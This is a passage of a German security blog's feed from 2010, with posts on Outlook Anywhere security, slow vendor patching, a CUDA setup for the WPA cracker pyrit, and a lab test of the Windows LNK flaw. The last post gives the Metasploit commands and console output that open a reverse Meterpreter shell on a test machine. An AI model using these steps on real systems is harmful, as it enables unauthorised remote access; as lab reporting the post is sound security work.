                Happy Birthday und ein dickes Dank an alle Mitwirkenden. Ihr macht eine grossartige Arbeit.<br />
<br />
Wer ihnen danken moechte: <a href="http://thank.debian.net/" title="http://thank.debian.net/">http://thank.debian.net/</a> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/271-Outlook-Anywhere-oder-RPC-over-HTTPS-sicher-genug-laut-Theorie.html" rel="alternate" title="Outlook Anywhere oder RPC over HTTPS - sicher genug laut Theorie" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-16T08:37:34Z</published>
        <updated>2010-08-16T08:37:34Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=271</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=271</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
            <category scheme="http://blog.h4des.org/index.php?/categories/6-windows" label="windows" term="windows" />
    
        <id>http://blog.h4des.org/index.php?/archives/271-guid.html</id>
        <title type="html">Outlook Anywhere oder RPC over HTTPS - sicher genug laut Theorie</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ich hatte vor einigen Tagen an <a href="http://blog.h4des.org/index.php?/archives/270-Outlook-Anywhere-oder-RPC-over-HTTPS-ist-es-sicher.html" title="http://blog.h4des.org/index.php?/archives/270-Outlook-Anywhere-oder-RPC-over-HTTPS-ist-es-sicher.html">dieser Stelle hier Zweifel</a> angemeldet, ob RPC over HTTPS (neuerdings das Marketing guenstigere Outlook-Anywhere) sicher ist. Nun habe ich auch einige antworten gefunden.<br />
<br />
<br />
Die erste Antwort gab mir die <a href="http://seclists.org/basics/2005/Jan/453" title="http://seclists.org/basics/2005/Jan/453">Security Basics Mailinglist</a>:<br />
<br />
<blockquote>Lets now look at RPC.  What are the major vulnerabilities of RPC?  RPC<br />
does<br />
not authenticate prior to allowing the connection to proceed.  Many of<br />
the<br />
RPC vulnerabilities would be neutered if RPC was force to authenticate<br />
prior<br />
to making the connection.  RPC over HTTP solves this problem by forcing<br />
authentication.  When I add HTTPS to this senario, I have secured my<br />
credentials while they are in an untrusted environment and provided<br />
authentication prior to allowing RPC to proceed.  The RPC traffic is<br />
also<br />
passed through the SSL tunnel providing end-to-end security.<br />
</blockquote><br />
<br />
<br />
Diese Antwort ist zwar von 2005, aber sollte ja heute noch genau so stimmen. Nun habe ich aber <a href="http://msdn.microsoft.com/en-us/library/aa378642%28VS.85%29.aspx" title="http://msdn.microsoft.com/en-us/library/aa378642%28VS.85%29.aspx">weitere Antworten gefunden</a>:<br />
<br />
<blockquote> RPC over HTTP provides three types of security in addition to standard RPC security, which results in RPC over HTTP traffic being protected once by RPC, and then doubly protected by the tunneling mechanism provided by RPC over HTTP. For a description of standard RPC security mechanisms, see Security. The RPC over HTTP tunneling mechanism adds to normal RPC security in the following manner:<br />
<br />
    <strong> Provides security through the IIS (available for RPC over HTTP v2 only).<br />
    </strong> Provides SSL encryption and RPC Proxy verification (mutual authentication). Also available in RPC over HTTP v2 only.<br />
    * Provides restrictions on the RPC Proxy level dictating which machines on the server network are allowed to receive RPC over HTTP calls.</blockquote><br />
<br />
Na das hoert sich doch schonmal recht gut an. Getestet habe ich es allerdings noch nicht. Dazu bedarf es auch noch ein wenig Zeit. Werde ich aber bestimmt demnaechst noch machen. Mein Fazit am gelesenen ist bis jetzt einfach, dass man RPC over HTTPS getrost einsetzen kann, sollte ein TMG davor eingesetzt werden. <a href="http://araihan.wordpress.com/2010/04/09/forefront-tmg-2010-publishing-exchange-server/" title="http://araihan.wordpress.com/2010/04/09/forefront-tmg-2010-publishing-exchange-server/">Diesen Link zur genaueren Konfiguration</a> hatte ich hierfuer zugeschickt bekommen.<br />
<br />
Der erste Eindruck und Ueberblick zu TMG zeigt mir, dass man sehr fein den HTTP-Traffic filtern und bearbeiten kann. Macht auf jedenfall (fuer ein M$ Produkt) einen guten ersten Eindruck bei mir.<br />
 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/270-Outlook-Anywhere-oder-RPC-over-HTTPS-ist-es-sicher.html" rel="alternate" title="Outlook Anywhere oder RPC over HTTPS - ist es sicher?" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-13T07:16:54Z</published>
        <updated>2010-08-16T08:47:42Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=270</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=270</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
            <category scheme="http://blog.h4des.org/index.php?/categories/6-windows" label="windows" term="windows" />
    
        <id>http://blog.h4des.org/index.php?/archives/270-guid.html</id>
        <title type="html">Outlook Anywhere oder RPC over HTTPS - ist es sicher?</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ich gehe im Moment der Frage nach, ob Outlook Anywhere (RPC over HTTPS) sicher ist. Ich bin im Moment dabei, ein Exchange 2010 System in Betrieb zu nehmen. Natuerlich moechten alle Nutzer gerne von aussen ihre eMails abrufen koennen ueber Outlook Anywhere. Aber ich bin mir im Moment unsicher, ob es sicher genug ist.<br />
<br />
Ich zitiere hier mal das Microsoft ISA 2006 Handbuch:<br />
<br />
<blockquote>[...]Der Vorteil von RPC ueber HTTPS ist, dass Sie hierfuer keine VPN-Verbindung benoetigen, wodurch die Clients von ueberall eine Verbindung mit dem Exchange Server herstellen koennen. Diese benoetigen nur eine Verbindung ins Internet, zum Beispiel ueber eine UMTS-Karte. Zudem muessen Sie nicht den kritischen Port 135 fuer Ihre Clients veroeffentlichen, damit eine Verbindung zwischen Outlook und dem Exchange Server hergestellt werden kann.[...]</blockquote> <br />
<br />
Das unsichere am Port 135 ist nun mal RPC. Dieses macht man von aussen einfach nicht erreichbar. Und fuer mich ist ein Tunneln von RPC durch das HTTPS Protokoll einfach das selbe. Ob ich nun den Exchange Server direkt ueber RPC von aussen erreiche oder ueber RPC welches durch HTTPS getunnelt ist, macht jetzt nicht so den grossen unterschied in meinen Augen.<br />
<br />
Das Exchange System soll natuerlich nicht direkt von aussen erreichbar sein. M$ TMG soll den Traffic vorher ueberpruefen. Allerdings habe ich darueber noch keine Informationen gefunden, ob TMG die RPC Aufrufe ueberprueft. Der ISA-Server 2006 packt (zumindest laut dem, was ich im Handbuch gelesen habe) das RPC Paket einfach nur aus dem HTTP Paket aus und leitet dieses weiter an den Exchange Server. Also kommt RPC ohne Ueberpruefung beim Exchange Server von aussen an. <br />
<br />
In meinen Augen bisher nicht so das Wahre. Aber ich bin mit meinen Nachforschungen noch nicht durch. Vielleicht habe ich ja was total wichtiges uebersehen. Das Ergebnis werde ich auf jedenfall mitteilen. 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/269-Responsible-Disclosure-ein-Beispiel-wie-Firmen-Sicherheitsluecken-ignorieren.html" rel="alternate" title="Responsible Disclosure - ein Beispiel wie Firmen Sicherheitsluecken ignorieren" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-04T14:12:47Z</published>
        <updated>2010-08-04T14:12:47Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=269</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=269</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
    
        <id>http://blog.h4des.org/index.php?/archives/269-guid.html</id>
        <title type="html">Responsible Disclosure - ein Beispiel wie Firmen Sicherheitsluecken ignorieren</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Gerade kam eine <a href="http://www.securityfocus.com/archive/1/512861/30/0/threaded" title="http://www.securityfocus.com/archive/1/512861/30/0/threaded">eMail bei Bugtraq</a>, in der ich mir wieder dachte: "Und da beschweren sich Software Firmen, dass Sicherheitsluecken sofort veroeffentlicht werden?!?"<br />
<br />
<blockquote>Disclosure Timeline<br />
-------------------<br />
20th February 2008 - Vendor Notification<br />
26th February 2008 - Vendor Response for more Details<br />
3rd March 2008 - Vendor Confirm Vulnerability<br />
3rd August 2010 - Vendor Patch Released<br />
</blockquote><br />
<br />
Citrix hat ueber 2 Jahre gebraucht, um einen Patch dafuer bereit zu stellen... <br />
<br />
Unterstuetzt einfach meine Haltung dazu. Frist setzen und wenn bis dahin der Hersteller keinen Patch fertig hat, selber Schuld. 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/268-Backtrack4-cuda-sdk-fehlt-HowTo-manuelle-Installation-von-CUDA-fuer-pyrit-und-co.html" rel="alternate" title="Backtrack4 cuda-sdk fehlt - HowTo manuelle Installation von CUDA fuer pyrit und co" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-08-04T13:21:08Z</published>
        <updated>2010-08-09T06:07:04Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=268</wfw:comment>
    
        <slash:comments>2</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=268</wfw:commentRss>
    
    
        <id>http://blog.h4des.org/index.php?/archives/268-guid.html</id>
        <title type="html">Backtrack4 cuda-sdk fehlt - HowTo manuelle Installation von CUDA fuer pyrit und co</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Nun wollte ich gestern mit der Backtrack4 DVD wieder pyrit mit CUDA Unterstuetzung zum laufen bringen, doch ist das cuda-sdk aus dem Repository von Backtrack4 verschwunden.<br />
<br />
Nach etwas nachlesen hab ich gesehen, dass es nun manuell nachinstalliert werden muss. Das Problem hierbei ist, es ist zu gross fuer meine Maschine um auf dem Live-System zu funktionieren. Also musste ich eben eine alte Festplatte rauskramen und Backtrack4 installieren. Dies ist total simpel und man muss nicht viel beachten. Einfach Backtrack4 starten, dann "startx" eingeben und auf dem Desktop befindet sich das Skript "install.sh". Dieses startet den grafischen Installer von Backtrack4. Nach der Installation neu starten und von der Festplatte booten, fertig.<br />
<br />
Nun laeuft aber Pyrit immer noch nicht mit CUDA Unterstuetzung. Dazu muessen wir nun von <a href="http://developer.nvidia.com/object/cuda_3_1_downloads.html" title="http://developer.nvidia.com/object/cuda_3_1_downloads.html">NVIDIA</a> die "Developer Drivers for Linux" und "GPU Computing SDK code samples" installieren.<br />
<br />
Als erstes werden die "Developer Drivers for Linux" installiert.<br />
<br />
<blockquote>root@bt:~# ./devdriver_3.1_linux_32_256.40.run</blockquote><br />
<br />
Noch etwas durch den Wizard sich durch druecken und schon hat man die Treiber fuer CUDA installiert. Als naechstes folgen die "GPU Computing SDK code samples":<br />
<br />
<blockquote>root@bt:~# ./gpucomputingsdk_3.1_linux.run</blockquote><br />
<br />
Hier nicht wundern, nachdem alles entpackt wurde und es so aussieht, als ob nichts geschehen wuerde, einfach einmal ENTER druecken. Dann geht es weiter. Als erstes wird eine Fehlermeldung erscheinen, dass CUDA nicht gefunden wurde. Einfach ignorieren und in das Verzeichnis installieren, welches angegeben wurde. Wenn die Installation durch ist, muessen wir noch folgendes machen:<br />
<br />
<blockquote>root@bt:~# echo "/usr/local/cuda/lib" > /etc/ld.so.conf.d/cuda.conf<br />
root@bt:~# ldconfig<br />
root@bt:~# echo "export PATH=$PATH:/usr/local/cuda/bin" >> /root/.bashrc<br />
root@bt:~# apt-get install cpyrit-cuda<br />
root@bt:~# logout</blockquote><br />
<br />
Nun neu einloggen und einmal testen, ob pyrit auch die GPU-Kerne erkennt:<br />
<br />
<blockquote>root@bt:~# pyrit list_cores<br />
Pyrit 0.3.1-dev (svn r265) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com<br />
This code is distributed under the GNU General Public License v3+<br />
<br />
The following cores seem available...<br />
#1:  'CUDA-Device #1 'GeForce 9600 GT''<br />
#2:  'CPU-Core (SSE2)'</blockquote><br />
<br />
Das sieht doch gut aus. Nun koennen wir <a href="http://blog.h4des.org/index.php?/archives/246-WPA-cracking-Wordlist-Regeln-von-John-The-Ripper-mit-Pyrit-CUDA-Berechnungen-kombinieren-update.html" title="http://blog.h4des.org/index.php?/archives/246-WPA-cracking-Wordlist-Regeln-von-John-The-Ripper-mit-Pyrit-CUDA-Berechnungen-kombinieren-update.html">pyrit wieder wie gewohnt benutzen.</a> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/267-Happy-Sysadmin-Day.html" rel="alternate" title="Happy Sysadmin Day" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-07-29T22:00:53Z</published>
        <updated>2010-07-29T22:00:53Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=267</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=267</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/1-RealLife" label="RealLife" term="RealLife" />
    
        <id>http://blog.h4des.org/index.php?/archives/267-guid.html</id>
        <title type="html">Happy Sysadmin Day</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ja, einen froehlichen happy Sysadmin Day. Freut euch an dem heutigen Tag, denn kaum ein User bemerkt unsere Arbeit. Und passend natuerlich, ich bin noch arbeiten... :/ 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://blog.h4des.org/index.php?/archives/266-Windows-LNK-Luecke-das-Metersploit-Modul-im-ersten-Test.html" rel="alternate" title="Windows LNK-Luecke - das Metersploit Modul im ersten Test" />
        <author>
            <name>sqall</name>
                    </author>
    
        <published>2010-07-29T08:59:55Z</published>
        <updated>2010-07-29T09:21:00Z</updated>
        <wfw:comment>http://blog.h4des.org/wfwcomment.php?cid=266</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://blog.h4des.org/rss.php?version=atom1.0&amp;type=comments&amp;cid=266</wfw:commentRss>
    
            <category scheme="http://blog.h4des.org/index.php?/categories/14-security" label="security" term="security" />
            <category scheme="http://blog.h4des.org/index.php?/categories/6-windows" label="windows" term="windows" />
    
        <id>http://blog.h4des.org/index.php?/archives/266-guid.html</id>
        <title type="html">Windows LNK-Luecke - das Metersploit Modul im ersten Test</title>
        <content type="xhtml" xml:base="http://blog.h4des.org/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                Ist zwar jetzt schon etwas laenger her, aber ich hatte jetzt endlich mal kurz Zeit die LNK-Luecke unter Windows zu testen. Ausgiebig konnte ich dies zwar noch nicht tun, aber ich hatte spass mit dem Metasploit Modul <strong>windows/browser/ms10_xxx_windows_shell_lnk_execute</strong>.<br />
<br />
Nachdem ich alle meine Daten in der Metasploit Konsole eingegeben habe:<br />
<br />
<blockquote>use windows/browser/ms10_xxx_windows_shell_lnk_execute<br />
set PAYLOAD windows/patchupmeterpreter/reverse_tcp<br />
set LHOST 192.168.55.2<br />
exploit</blockquote><br />
<br />
Wurde auch der Fake Webserver gestartet. Die Ausgabe sieht dann wie folgt aus:<br />
<br />
<blockquote>[*] Exploit running as background job.<br />
<br />
[*] Started reverse handler on 192.168.55.2:4444 <br />
[*] <br />
[*] Send vulnerable clients to \\192.168.55.2\rzAATIPqRf\.<br />
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk<br />
[*] <br />
[*] Using URL: http://0.0.0.0:80/<br />
[*]  Local IP: http://192.168.55.2:80/<br />
[*] Server started.</blockquote><br />
<br />
Nun habe ich mit einem Windows XP und einem Windows 2008 R2 Server etwas getestet. Andere Windows Versionen hatte ich in meinem Labor nicht zur Verfuegung. Das Windows XP mit dem alten Internet Explorer reagiert sofort auf die Umleitung und greift via WebDAV zu und versucht die Icons anzuzeigen. Ab dann habt ihr eine Meterpreter Session im Hintergrund. Die Ausgabe auf eurer Metasploit Maschine sieht dann ungefaehr so aus:<br />
<br />
<br />
<blockquote>[*] Sending UNC redirect to 192.168.55.101:1083 ...<br />
[*] Responding to WebDAV OPTIONS request from 192.168.55.101:1098<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf<br />
[*] Sending 301 for /rzAATIPqRf ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf/<br />
[*] Sending directory multistatus for /rzAATIPqRf/ ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf<br />
[*] Sending 301 for /rzAATIPqRf ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf/<br />
[*] Sending directory multistatus for /rzAATIPqRf/ ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf/desktop.ini<br />
[*] Sending 404 for /rzAATIPqRf/desktop.ini ...<br />
[*] Sending LNK file to 192.168.55.101:1098 ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf/epKOU.dll.manifest<br />
[*] Sending 404 for /rzAATIPqRf/epKOU.dll.manifest ...<br />
[*] Sending DLL payload 192.168.55.101:1098 ...<br />
[*] Received WebDAV PROPFIND request from 192.168.55.101:1098 /rzAATIPqRf/epKOU.dll.123.Manifest<br />
[*] Sending 404 for /rzAATIPqRf/epKOU.dll.123.Manifest ...<br />
[*] Sending stage (2650 bytes) to 192.168.55.101<br />
[*] Sleeping before handling stage...<br />
[*] Uploading DLL (748043 bytes)...<br />
[*] Upload completed.<br />
[*] Meterpreter session 1 opened (192.168.55.2:4444 -> 192.168.55.101:1099) at 2010-07-29 11:12:50 +0200</blockquote><br />
<br />
Wenn ihr nun einfach in der Metersploit Konsole schaut, ob auch alles geklappt hat:<br />
<br />
<blockquote>msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions<br />
<br />
Active sessions<br />
===============<br />
<br />
  Id  Type         Information          Connection<br />
  --  ----         -----------          ----------<br />
  1   meterpreter  WINVM\sqall @ WINVM  192.168.55.2:4444 -> 192.168.55.101:1099</blockquote><br />
<br />
Nun koennt ihr euch mit dieser Session verbinden:<br />
<br />
<blockquote>msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1<br />
[*] Starting interaction with 1...<br />
<br />
meterpreter ></blockquote><br />
<br />
Und ihr seid auf dem Rechner mit dem Meterpreter, der anfaellig gegen diese Luecke war.<br />
<br />
Der Firefox reagiert auf die Umleitung nicht und leitet komplett falsch um. Unter Windows 2008 R2 Server hatte der Internet Explorer in der Standardeinstellung auch die Umleitung auf den WebDAV Dienst ignoriert. Hier konnte ich auf die schnelle keine Meterpreter Session aufbauen.<br />
<br />
Allerdings scheint das Metersploit Modul noch nicht ganz ausgereift zu sein. Denn ab und zu gibt es Timeouts auf dem Client und ihr muesst die Session aktualisieren, damit der Browser auch auf das WebDAV Verzeichnis zugreift. Fuer einen wirklichen Angriff meiner Meinung nach nicht geeignet.<br />
<br />
Weitere Tests werde ich wohl erst bei etwas mehr Zeit durchfuehren koennen, aber hier schon mal ein kleiner Vorgeschmack <img src="http://blog.h4des.org/templates/default/img/emoticons/wink.png" alt=";-)" style="display: inline; vertical-align: bottom;" class="emoticon" /> 
            </div>
        </content>
        
    </entry>

</feed>